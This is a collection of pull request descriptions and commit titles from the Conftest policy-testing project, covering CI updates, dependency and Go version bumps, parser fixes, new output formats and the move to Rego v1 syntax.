Using the if keyword without also using the contains keyword makes the rule name in the OPA AST an emptry string, which causes conftest to inadvertently skip over tests leading to inaccurate results.
https://github.com/open-policy-agent/opa/issues/6509

feat: Raise error when problematic use of the if keyword is encountered

---

internal/commands/test.go

The pull command uses TLS by default by way of the default value set for the `tls` flag.  This change updates the test command so `--update` flag can use TLS by default to align with the pull command.

fix: Add tls flag to test command

---

.github/dependabot.yml
go.mod
go.sum

Updates the buildkit dependency to get rid of CVE scanner findings:
- CVE-2024-23651
- CVE-2024-23652
- CVE-2024-23653
- CVE-2024-23650
Additionally add buildkit to the allowed dependencies in dependabot config.

chore: Update buildkit and allow dependabot

---

.github/workflows/pr.yaml
internal/commands/default.go
internal/commands/fmt.go
internal/commands/parse.go
internal/commands/pull.go
internal/commands/push.go
internal/commands/test.go
internal/commands/verify.go
internal/registry/client.go
plugin/xdg_test.go
policy/engine.go

Updating the actions in the PR workflow to resolve the `node` deprecation warnings. There is still one that remains from the `regal` linter, but we'll have to wait for @anderseknert to cut a new release.
Had to update our `bats` action to `bats-core/bats-action@1.5.4` because the one we're using no longer appears to be maintained. Regardless, should be for the best coming from the `core` team.
Some linting errors seemed to have popped up as well from this (or just bad timing with a release from the `golangci-lint` team) so those have been addressed as well.

Update workflow action versions

---

.github/workflows/pr.yaml
.github/workflows/release.yaml

This matches the version now used in the container https://github.com/open-policy-agent/conftest/pull/913.

build: Bump Go to 1.22.x

---

.github/workflows/pr.yaml

Updates the `setup-regal` linter to v1 and the `golangci-lint` action to v4 to help resolve the `node` deprecation warnings.
- Adding `false` to the install params on `bats-core`: I was seeing a ton of new warnings/errors that weren't there before (https://github.com/open-policy-agent/conftest/actions/runs/7901911540) when attempting to install these tools, but it doesn't look like we even use them.
- Adding `cache: false` to `setup-go`: I was seeing a ton of file exists errors (https://github.com/open-policy-agent/conftest/actions/runs/7902189087) and it looks like people were reporting similar problems when caching was enabled (https://github.com/golangci/golangci-lint-action/issues/807 and https://github.com/golangci/golangci-lint-action/issues/677). Resolution seems to be to disable …

chore: Update setup-regal and golangci-lint actions to latest

---

docs/sharing.md
internal/commands/test.go

fix: Use the right command to pull policies from oci registry

---

downloader/oci_detector.go
downloader/oci_detector_test.go

Relates to https://github.com/open-policy-agent/conftest/issues/919 and https://github.com/open-policy-agent/conftest/pull/920
I'm not convinced we really need to utilize `regex` for URL detection (we should just be able to get by with string contains checking?), but to keep things as they are I just added another check for `pkg.dev`

fix: Catch Google Artifact Registry URL during OCI detection

---

internal/commands/verify.go

When unit testing, users are likely to prefer being informed of builtin errors encountered, such as when parsing configurations.

cmd(verify): Enable show-builtin-errors by default

---

policy/engine.go
policy/engine_test.go
tests/problematic-if/policy/valid_bare_deny.rego
tests/problematic-if/test.bats

If the rule has a name set, that means there isn't problematic use of the 'if' keyword without 'contains' so we can skip those.
---
Fixes #934

fix: Only raise problematic if error when rule has no name set

---

.github/dependabot.yml

Dependabot is currently blocked from updating this library, which has a known vulnerability (https://github.com/open-policy-agent/conftest/issues/942).

ci: Allow Dependabot to update github.com/hashicorp/go-getter

---

examples/hcl2/policy/deny.rego
examples/hcl2/policy/deny_test.rego
examples/hcl2/terraform.tf

This one extends the HCL tests with a scenario: "using rego, making sure all AWS resources are tagged so we can use them for tracking purposes/cost calculations". It was one of the cases that I'll present on [devconf.cz](https://www.devconf.info/cz/) which will be about OPA

tests: extend hcl cases: tag verification

---

.github/workflows/release.yaml

The current v1 is throwing warnings about using the deprecated `save-state` verb in GH Actions.

ci: Bump Docker login to v3

---

.github/workflows/release.yaml
.goreleaser.yml

Goreleaser released v2 last month which is throwing warnings in CI. This pins us to v1 until we review the upgrade instructions.
https://goreleaser.com/blog/goreleaser-v2/#upgrading

ci: Pin Goreleaser to v1

---

.github/workflows/pr.yaml

https://github.com/open-policy-agent/conftest/pull/972 is currently blocked due to an issue with the linter.

ci: Bump golangci-lint action to v6

---

downloader/oci_detector.go

This is a PR to fix https://github.com/open-policy-agent/conftest/issues/971
The regex in oci_detector.go is not in correct format.
In regex, the dot . in domain should be escaped.
For example: ***.**, should be ***\.**
So that it'll match the . as a . string, but not any single character in regex.

fix: update regex to excape the dot in it

---

output/azuredevops.go

I have identified a missing space that is causing a printing error on Azure DevOps. In the original file output\azuredevops.go, the message is ##vso[task.logissuetype=warning] without a space. My fix is to add a space, resulting in ##vso[task.logissue type=warning]. This should resolve the printing error on Azure DevOps.
- Corrected the typo in output\azuredevops.go

fix: missing space causing printing error on azuredevops

---

go.mod

This updates _go_ version to `1.22`
It might also fix https://github.com/open-policy-agent/conftest/pull/994 as it was the only one diff if I clone the dependabot branch, then run `go mod tidy`

bump: update go to 1.22 to get on par with toolchain

---

.github/workflows/pr.yaml
.github/workflows/release.yaml
go.mod

This aligns the CI systems to match the container version that was updated
in 6dff941f378e4e7a287eca791206c728d261acbe.

chore: Bump Go to 1.23

---

examples/builtin-errors/invalid-dns.rego

It looks like non-existent domains are no longer causing built-in-err for `lookup_ip_addr`, except the parse-related issues.
This PR makes sure `lookup_ip_addr` used in tests throws a parse error which causes _builtin-err_
It seems there's a regression on our test when the underlying name-resolution libs behavior changed after an opa/golang version update: https://github.com/open-policy-agent/opa/blob/main/docs/content/policy-reference.md#notes-on-name-resolution-netlookup_ip_addr
Addresses CI errors on: #1016 #1015 #1009 #1008

fix: make sure lookup_ip_addr throwing builtin-err in test

---

downloader/downloader.go
downloader/downloader_test.go

File existence check before downloading policies. Errors out and no overwrites. Maintains data integrity by preventing accidental policy overwrites.
Added a test which verifies the behaviour.
Fixes #957

fix: prevent policy file overwrite on downloads

---

parser/yaml/yaml.go
parser/yaml/yaml_test.go

The YAML parser was incorrectly splitting documents with version directives (e.g. '%YAML 1.1') by treating the first '---' marker as a document separator. This caused the version directive to be separated from its document, resulting in parsing errors. Fixed document separation logic to keep version directive with its document.
Added test cases for various YAML scenarios and improved test coverage.
Fixes #998

fix: improve handling for YAML version directives

---

parser/jsonnet/jsonnet.go
parser/jsonnet/jsonnet_test.go

- Set MaxStackTraceSize to 20 for cleaner errors
- Add test for stack overflow prevention
- Improve test structure with table-driven pattern

fix: tune jsonnet VM stack trace logging and add test coverage

---

parser/jsonnet/jsonnet.go
parser/jsonnet/jsonnet_test.go
parser/parser.go

- Introduce a new `PathAwareParser` interface that extends `Parser` with `SetPath(path string)`.
- Update `parseConfigurations` to detect if a parser implements `PathAwareParser`, and call `SetPath(path)`.
- Implement `SetPath` in the Jsonnet parser, setting the JPath (library path) to the file’s directory.
- Add tests to ensure that relative imports in Jsonnet now work as expected.
Fixes #939

feat: enable relative jsonnet imports by setting a path-aware importer

---

internal/commands/push.go

Remove an unnecessary error check for configDesc creation in the push command. The NewDescriptorFromBytes function does not return an error, so checking for one was redundant and could never be triggered.

fix: remove redundant error check in push command

---

.golangci.yaml
internal/commands/parse.go
parser/cyclonedx/cyclonedx.go
parser/format.go
parser/spdx/spdx.go

* Fix typo in `.golangci.yaml` to enable linter settings
* Fix marshal/unmarshal spelling across codebase

fix: correct linters-settings in .golangci.yaml to enable misspell

---

.golangci.yaml

* Add nilness check to govet linter configuration
See #1041 for an example

chore: add nilness check to govet linter

---

internal/registry/client_test.go

Add a test case that verifies SetupClient returns an error when the Docker config file is not readable due to permissions. This ensures the credentials store initialization failure is properly handled.
Increases test coverage from 90.9% to 100% for the `registry` package.

test(registry): add test for credentials store init failure

---

parser/json/json.go
parser/json/json_test.go

Strip UTF-8 BOM (byte order mark) from JSON input before parsing, allowing
users to directly use files containing BOM with conftest. Matches OPA's
implementation at https://github.com/open-policy-agent/opa/pull/6989.
Fixes #862

feat(parser): handle UTF-8 BOM in JSON input

---

plugin/install_test.go
plugin/plugin_test.go

Add tests for Load, FindAll and plugin Exec functionality. Includes test coverage for plugin loading, discovery and command execution.
Increases test coverage from 35.6% -> 81.9% in the `plugin` package.

test(plugin): add comprehensive plugin package tests

---

docs/options.md
go.mod
go.sum
output/output.go
output/output_test.go
output/sarif.go
output/sarif_test.go
policy/engine.go

This pull request introduces `--output=sarif` feature that produces [SARIF 2.1.0](https://docs.oasis-open.org/sarif/sarif/v2.1.0/sarif-v2.1.0.html) logs from Conftest policy evaluations using the [go-sarif](https://github.com/owenrumney/go-sarif) library. The implementation handles Conftest-specific logic, such as pass/fail/skipped/exception states, unique rule ID derivation, and multi-rule checks from single policy definitions.
- Uses `go-sarif/v2` library to ensure proper SARIF schema compliance and maintainability
- `output/sarif.go` implements a dedicated outputter that:
- Organizes policy evaluations into a SARIF run
- Maps Conftest results to appropriate SARIF severity levels (error/warning/note/none)
- Preserves rule metadata and properties in the SARIF output
- Handles all result …

feat: Implement SARIF output

---

internal/commands/test.go
internal/commands/verify.go
output/azuredevops.go
output/azuredevops_test.go
output/github.go
output/github_test.go
output/json.go
output/json_test.go
output/junit.go
output/junit_test.go
output/output.go
output/result.go
output/result_test.go
output/sarif.go
output/standard.go
output/standard_test.go
output/table.go
output/table_test.go
output/tap.go
output/tap_test.go
policy/engine.go
runner/test.go
runner/verify.go

Adding a new type for a slice of CheckResult to add helper methods for checking if there were failures, warnings, or exceptions.

refactor(output): Add CheckResults type and helpers

---

internal/commands/pull.go
tests/pull-absolute-paths/test.bats

Add a new flag to the pull command that allows preserving absolute paths when downloading policies. By default, absolute paths in the --policy flag are treated as relative paths from the current directory. With the new --absolute-paths flag, users can specify absolute paths to download policies to.
Fixes #989

feat: add --absolute-paths flag to pull command

---

docs/options.md
internal/commands/test.go

Improve documentation to make it clear that when both `--trace` and `--output` flags are specified, the output format takes priority over tracing. This helps users understand that they cannot combine tracing with custom output formats like JSON or table.
Relates to #1031

 docs: clarify --trace flag behavior with --output flag

---

policy/engine.go

Conftest encounters errors on Windows when loading file paths that include drive letters (e.g., `C:/path/to/data.yaml`). Even when using a file URL (e.g., `file:///C:/path/to/data.yaml`), we still face issues.
With these code changes, Conftest can now successfully load files using a file URL (e.g., `file:///C:/path/to/data.yaml`).
We opted for file URLs(e.g., `file:///C:/path/to/data.yaml`) instead of paths with drive letters (e.g., `C:/path/to/data.yaml`) because OPA does not support file paths with drive letters. For more details, see [this issue comment](https://github.com/open-policy-agent/opa/pull/6922#issuecomment-2312969000).
Resolves: https://github.com/open-policy-agent/conftest/issues/979
@boranx Can you please review this changes? Thank you

 fix: Conftest can now successfully load files using a file URL (e.g., `file:///C:/path/to/data.yaml`) on windows

---

mkdocs.yml

The recent documentation feature was missing in the navigation bar. This adds it to the list so users can navigate w/o finding references on their own

docs: add documentation feature to the navigation bar

---

.github/workflows/pr.yaml

It doesn't need them.
https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/controlling-permissions-for-github_token

ci: Remove PR workflow access to all permissions from GITHUB_TOKEN

---

.github/workflows/pr.yaml
.github/workflows/release.yaml
Makefile

Fixes #1066 
Migrate from Makefile to GitHub Actions for Docker Builds
This change uses pre-made GitHub Actions workflow for Docker to replace docker-related Makefile commands.

refactor(ci): replace Makefile-based Docker builds with GitHub Action

---

docs/documentation.md

Change the relative link to the default template to use an absolute URL pointing to the raw GitHub content for better accessibility. Currently the link is broken since the file from the relative path is not deployed to the docs site.
Fixes #1090

docs: update default template link to use absolute URL

---

.github/workflows/pr.yaml

This step is slow to run and only needs to be tested after everything else.

ci: Move docker build to separate job in the PR workflow

---

acceptance.bats
runner/test.go

We use Bazel for CI in our environment, which relies heavily on symlinks to build the workspace in which conftest runs. However, when the file list to process is a symlinked directory, the `getFilesFromDirectory` incorrectly assumes the symlink is a file, adding it to the final `files` array, where `getConfigurationContent` in `parser/parser.go` will error out:
```
Error: running test: parse configurations: get configuration content: open file: read /tmp/symlink: is a directory, path: /tmp/symlink
```
A minimal example to reproduce:
```
ln -s $(pwd)/examples/hcl2 /tmp/symlink 
make build
./conftest test -p examples/hcl2/policy /tmp/symlink
```
This PR suggests a way to address that, keeping a list of visited directories to protect against endless loops.

feat(runner): add support for symlinks

---

docs/debug.md
internal/commands/test.go
output/output.go
output/output_test.go
output/standard.go

This change standardizes the behavior of the `--trace` flag. When `--trace` is used, trace output is now consistently directed to stderr, while the primary formatted output (controlled by `--output`) remains on stdout.
Previously, combining `--trace` with non-standard output formats (e.g., `--output=json`, `--output=table`) resulted in trace output being suppressed entirely. This update resolves that limitation, enabling users to capture detailed trace information separately from the main results, regardless of the chosen output format. For instance, trace logs can be saved to a file using stderr redirection:
`conftest test --trace --output=table my_config.yaml 2> trace.log`
BREAKING CHANGE: Trace output is now always sent to stderr when `--trace` is enabled, including when using the …

feat(output): redirect trace output to stderr

---

docs/exceptions.md
docs/index.md
docs/options.md

Fixes https://github.com/open-policy-agent/conftest/issues/1069

docs: Make examples in the docs compatible with v1 syntax

---

internal/commands/test.go
internal/commands/verify.go

As discussed in https://github.com/open-policy-agent/conftest/issues/1067, we want to make v1 syntax the default. This is a breaking change, but has been announced in the release notes as an upcoming change since the Feb release.
Fixes https://github.com/open-policy-agent/conftest/issues/1070

cli: Make Rego v1 syntax the default

---

internal/commands/fmt.go

Add `--rego-version` flag to `fmt` command; it mirrors the flag of `test` and `verify`.
Sadly, `loader.AllRegos` does not offer a way to specify the desired rego version: we need to duplicate its implementation that creates a loader and then calls `Filtered`.
Implementation notes / questions:
* I am not sure whether this is more a fix or a feature
* `v1` is the default version (to match to 0.60 release); however, this can be seen as a breaking change, too :shrug: 
* There is a slight overload with `engine.Load`; but it is IMO not worth to consolidate it.
Fixes #1127

fix: Use v1 as rego version for fmt, too

---

go.mod
go.sum
parser/jsonc/jsonc.go

The `jsonc` lib maintainer changed where the repo is hosted. This commit updates the import path of the dependency accordingly, in order to avoid potential issues while running `go mod download`
Fixes #1132

deps: update jsonc import path

---

.github/workflows/pr.yaml
.github/workflows/release.yaml

The current workflow takes almost 40min due to running the docker builds in series rather than in paralllel.

ci: Run docker builds in parallel during release

---

builtins/parse_config.go
builtins/parse_config_test.go
document/metadata.go
internal/commands/default.go
internal/commands/fmt.go
internal/commands/test.go
output/azuredevops.go
output/github.go
output/json.go
output/junit.go
output/output.go
output/sarif.go
output/standard.go
output/table.go
output/tap.go
policy/engine.go
policy/engine_test.go
runner/verify.go

This is a no-op in practical sense, just removing the v0 -> v1 redirection layer.
Some test cases had to be updated to use v1 syntax because using the v1 import defaults to v1 syntax.
The `TestProblematicIf` test was removed as it is no longer needed now that v1 syntax is finalized.

chore: Replace OPA v0 with v1 import paths

---

Dockerfile

The docker build step warns about this on each run.

chore: Use uppercase for all Dockerfile build keywords

---

internal/commands/default.go
internal/commands/reformat.go
internal/commands/reformat_test.go
tests/reformat/test.bats

Add new reformat command that converts conftest JSON output to different formats (table, junit, sarif, etc). Supports both positional arguments and stdin input, aligning with existing conftest command patterns.
- Use positional args for input files: reformat file.json
- Support stdin input for piping: conftest test | reformat
- Add comprehensive BATS tests
Fixes #1145

feat: add reformat command for JSON output conversion

---

.github/workflows/pr.yaml
.github/workflows/release.yaml
Dockerfile
go.mod

Go version 1.23 is no longer supported as per [the Go release policy](https://go.dev/doc/devel/release#policy).
This PR updates the build & SDK version to the latest v1.25.0

chore(deps): bump Go version to 1.25

---

Makefile

macOS, as well as the latest Debian and Ubuntu use "python3" and not "python" for the name of the Python installation on the system. Using "python" is now legacy and is not present in $PATH even when Python is installed.
Fixes https://github.com/open-policy-agent/conftest/issues/1180.

fix: Use "python3" instead of "python" in the Makefile

---

plugin/install_test.go
plugin/plugin.go
plugin/xdg.go
plugin/xdg_test.go

This fixes an issue on macOS where XDG_DATA_DIRS points to an unwritable location.
Also update the XDG test code to not rely on OS environment variables, unblocking parallel test execution.
Fixes: https://github.com/open-policy-agent/conftest/issues/1179

fix: Only use XDG directories for plugin if they are writable
